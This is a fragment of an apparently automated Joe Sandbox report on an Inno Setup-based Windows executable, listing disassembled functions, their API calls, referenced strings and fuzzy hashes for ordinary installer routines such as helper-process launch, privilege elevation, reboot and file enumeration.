                                                                                                    • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                                    • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                                    • API String ID: 770386003-3271284199
                                                                                                    • Opcode ID: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                                    • Instruction ID: 54c9584e853abf465b9d0f30fdd509929e5717807e8393d963d4681616065440
                                                                                                    • Opcode Fuzzy Hash: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                                    • Instruction Fuzzy Hash: 19710470A003449EDB11EB65CC45B9E77F4EB05705F1085BAF904FB282DB7899488F69
                                                                                                    APIs
                                                                                                      • Part of subcall function 00478370: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                                      • Part of subcall function 00478370: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                                      • Part of subcall function 00478370: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                                      • Part of subcall function 00478370: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02112BD8,?,?,?,02112BD8), ref: 004783CC
                                                                                                      • Part of subcall function 00478370: CloseHandle.KERNEL32(00000000,?,?,?,02112BD8,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                                      • Part of subcall function 00478448: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004784DA,?,?,?,02112BD8,?,0047853C,00000000,00478652,?,?,-00000010,?), ref: 00478478
                                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 0047858C
                                                                                                    • GetLastError.KERNEL32(00000000,00478652,?,?,-00000010,?), ref: 00478595
                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004785E2
                                                                                                    • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478606
                                                                                                    • CloseHandle.KERNEL32(00000000,00478637,00000000,00000000,000000FF,000000FF,00000000,00478630,?,00000000,00478652,?,?,-00000010,?), ref: 0047862A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                                    • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                                    • API String ID: 883996979-221126205
                                                                                                    • Opcode ID: d94476177e89f61339d65e5f577ff2872d1a8d23f03fec93f8535f7d0bd6bb56
                                                                                                    • Instruction ID: b05a94d88e1d9ee0fbafe330a65326fe691daae9ca7e583bddfe233bc85c86e1
                                                                                                    • Opcode Fuzzy Hash: d94476177e89f61339d65e5f577ff2872d1a8d23f03fec93f8535f7d0bd6bb56
                                                                                                    • Instruction Fuzzy Hash: 0E314470A40208BEDB11EFE6C859ADEB7B8EB45718F50843FF508E7281DA7C99058B5D
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
                                                                                                    • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSendShowWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 1631623395-0
                                                                                                    • Opcode ID: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                                    • Instruction ID: 9e9026b6a08d43f4c34b0c014f83afec13b9727198b5f0eb67f7172f0d04fbcb
                                                                                                    • Opcode Fuzzy Hash: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                                    • Instruction Fuzzy Hash: 90915171B04214BFDB11EFA9DA86F9D77F4AB04304F5500BAF504AB392CB78AE419B58
                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 00418393
                                                                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
                                                                                                    • GetWindowRect.USER32(?), ref: 004183CC
                                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 004183DA
                                                                                                    • GetWindowLongA.USER32(?,000000F8), ref: 004183EF
                                                                                                    • ScreenToClient.USER32(00000000), ref: 004183F8
                                                                                                    • ScreenToClient.USER32(00000000,?), ref: 00418403
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                    • String ID: ,
                                                                                                    • API String ID: 2266315723-3772416878
                                                                                                    • Opcode ID: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                                    • Instruction ID: 8875a2d430ef8be2c5346fa25315cde737655516302bc4d2344e38a88124d083
                                                                                                    • Opcode Fuzzy Hash: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                                    • Instruction Fuzzy Hash: 2B112B71505201ABEB00DF69C885F9B77E8AF48314F04067EFD58DB296D738D900CB65
                                                                                                    APIs
                                                                                                    • GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
                                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
                                                                                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
                                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
                                                                                                    • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                    • API String ID: 107509674-3733053543
                                                                                                    • Opcode ID: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                                    • Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
                                                                                                    • Opcode Fuzzy Hash: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                                    • Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
                                                                                                    APIs
                                                                                                    • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D191
                                                                                                    • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D1A1
                                                                                                    • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D1B1
                                                                                                    • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F96F,00000000,0047F998), ref: 0045D1D6
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$CryptVersion
                                                                                                    • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                                    • API String ID: 1951258720-508647305
                                                                                                    • Opcode ID: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                                    • Instruction ID: d394b6b565b4a55a8c16e24b867b534ad65140704dc94b035c924c7661ebf9a3
                                                                                                    • Opcode Fuzzy Hash: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                                    • Instruction Fuzzy Hash: A2F030B0D41700CAD318EFF6AC957263B96EB9830AF14C03BA414C51A2D7794454DF2C
                                                                                                    APIs
                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0,?,?,00000000,0049B628), ref: 004980FB
                                                                                                    • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049817E
                                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000), ref: 00498196
                                                                                                    • FindClose.KERNEL32(000000FF,004981C1,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0), ref: 004981B4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileFind$AttributesCloseFirstNext
                                                                                                    • String ID: isRS-$isRS-???.tmp
                                                                                                    • API String ID: 134685335-3422211394
                                                                                                    • Opcode ID: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                                    • Instruction ID: fc6fb5a4e2302b333323d0d019d05182e8323e6fc1a1653111c694b95695a562
                                                                                                    • Opcode Fuzzy Hash: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                                    • Instruction Fuzzy Hash: E1316A719016186FCF10EF69CC42ADEBBBCDB45314F5044BBA808E3291DA3C9F458E58
                                                                                                    APIs
                                                                                                    • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457611
                                                                                                    • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457638
                                                                                                    • SetForegroundWindow.USER32(?), ref: 00457649
                                                                                                    • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457921,?,00000000,0045795D), ref: 0045790C
                                                                                                    Strings
                                                                                                    • Cannot evaluate variable because [Code] isn't running yet, xrefs: 0045778C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                                    • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                                    • API String ID: 2236967946-3182603685
                                                                                                    • Opcode ID: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                                    • Instruction ID: 8776962154e21e4b1c8854f5ca4bcfaa90dd950cda3ad59ac2e2fede597431d6
                                                                                                    • Opcode Fuzzy Hash: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                                    • Instruction Fuzzy Hash: 2B91D334608204DFEB15CF55E991F5ABBF5EB89704F2184BAE80497792C638AE04DB68
                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                    • API String ID: 1646373207-3712701948
                                                                                                    • Opcode ID: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                                    • Instruction ID: d81c9a8c7c52065d28d66f53e81ce4f313aa74f068c2efe820cb9bfc493487ae
                                                                                                    • Opcode Fuzzy Hash: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                                    • Instruction Fuzzy Hash: B0418671A04649AFCF01EFA5C8929EEB7B8EF48305F504567F804F7292D67C5E098B68
                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 00417D0F
                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                                    • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                                    • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Placement$Iconic
                                                                                                    • String ID: ,
                                                                                                    • API String ID: 568898626-3772416878
                                                                                                    • Opcode ID: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                                    • Instruction ID: e85585575f8c5a3e7823c55acc6b28d6d187d41511fbfc80546af44b70413e2d
                                                                                                    • Opcode Fuzzy Hash: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                                    • Instruction Fuzzy Hash: 4C2112716042089BDF10EF69D8C1AEA77B8AF48314F05456AFD18DF346D678DD84CBA8
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00000001,00000000,0046433F), ref: 004641CD
                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 00464213
                                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642C8
                                                                                                    • FindClose.KERNEL32(000000FF,004642F3,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642E6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 4011626565-0
                                                                                                    • Opcode ID: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                                    • Instruction ID: 9d9184480f8630aada0b530c6bd54f2fc26159d28d851f3c8c43bf9f92f270d6
                                                                                                    • Opcode Fuzzy Hash: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                                    • Instruction Fuzzy Hash: 77418370A00A18DBCF10EFA5DC959DEB7B8EB88305F5044AAF804A7341E7789E448E59
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00000001,00000000,00463E99), ref: 00463D0D
                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463D9C
                                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E2E
                                                                                                    • FindClose.KERNEL32(000000FF,00463E55,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E48
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$File$CloseErrorFirstModeNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 4011626565-0
                                                                                                    • Opcode ID: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                                    • Instruction ID: 85e7d80bc36d7b3e80fea797042c039a90a2821ca6a16b1e557570abf42aa49f
                                                                                                    • Opcode Fuzzy Hash: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                                    • Instruction Fuzzy Hash: 3A41B770A00A589FCB11EF65CC45ADEB7B8EB88705F4044BAF404A7381E67D9F48CE59
                                                                                                    APIs
                                                                                                    • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
                                                                                                    • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
                                                                                                    • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
                                                                                                    • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
                                                                                                    • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$CloseControlCreateDeviceFileHandle
                                                                                                    • String ID:
                                                                                                    • API String ID: 1177325624-0
                                                                                                    • Opcode ID: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                                    • Instruction ID: 661b18b1de4eb1238568a50ab540e77c3175952f9b14320adb6d96c9b056064d
                                                                                                    • Opcode Fuzzy Hash: 00c40fca2cfdd97ba02e44e9efda7f487b55ec81a2bcf6d63bb4130569f45397
                                                                                                    • Instruction Fuzzy Hash: 80F090B23A17207AF620B57A5C86F7F418CCB89B68F10423BBA04FF1D1D9A85D0555AD
                                                                                                    APIs
                                                                                                    • IsIconic.USER32(?), ref: 0048397A
                                                                                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 00483998
                                                                                                    • ShowWindow.USER32(00000000,00000005,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839BA
                                                                                                    • ShowWindow.USER32(00000000,00000000,00000000,000000F0,0049C0A8,00482E56,00482E8A,00000000,00482EAA,?,?,?,0049C0A8), ref: 004839CE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Show$IconicLong
                                                                                                    • String ID:
                                                                                                    • API String ID: 2754861897-0
                                                                                                    • Opcode ID: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                                    • Instruction ID: 3cea9153c2b451a1fdc95e78a984a36fb28f479a74ffefb17a89e5a976076ef3
                                                                                                    • Opcode Fuzzy Hash: 388bc32bc28a7c539796bab44a6ba9bad50612e2c7d9e5998850325d2fd9b569
                                                                                                    • Instruction Fuzzy Hash: 160156B0705200ABEA00BF659CCBB5F22C55714745F44093BF4459B292CAADDA859B5C
                                                                                                    APIs
                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,00462824), ref: 004627A8
                                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,00462804,?,00000000,?,00000000,00462824), ref: 004627E4
                                                                                                    • FindClose.KERNEL32(000000FF,0046280B,00462804,?,00000000,?,00000000,00462824), ref: 004627FE
                                                                                                    Memory Dump Source
